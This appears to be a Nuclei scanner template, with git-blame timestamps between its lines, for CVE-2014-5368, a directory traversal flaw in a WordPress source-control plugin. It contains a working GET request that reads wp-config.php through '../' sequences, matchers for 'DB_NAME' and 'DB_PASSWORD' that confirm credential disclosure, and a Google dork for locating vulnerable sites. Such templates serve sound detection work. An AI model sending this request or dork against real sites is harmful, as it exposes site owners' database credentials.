2021-08-05 23:09:11 +00:00
id : CVE-2014-5368
info :
name : WordPress Plugin WP Content Source Control - Directory Traversal
author : daffainfo
severity : high
2022-02-25 22:07:55 +00:00
description : A directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
2021-08-19 13:59:12 +00:00
reference :
2022-02-25 22:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-5368
2021-08-05 23:09:11 +00:00
- https://www.exploit-db.com/exploits/39287
2022-05-17 09:18:12 +00:00
- http://seclists.org/oss-sec/2014/q3/417
2022-02-25 22:07:55 +00:00
classification :
cve-id : CVE-2014-5368
2022-07-11 17:26:32 +00:00
metadata :
google-query : inurl:"/wp-content/plugins/wp-source-control"
2022-08-27 04:41:18 +00:00
tags : cve,cve2014,wordpress,wp-plugin,lfi,edb,seclists
2021-08-05 23:09:11 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
matchers-condition : and
matchers :
- type : word
words :
- "DB_NAME"
- "DB_PASSWORD"
part : body
condition : and
- type : status
status :
- 200
2022-02-25 22:07:55 +00:00
# Enhanced by mp on 2022/02/25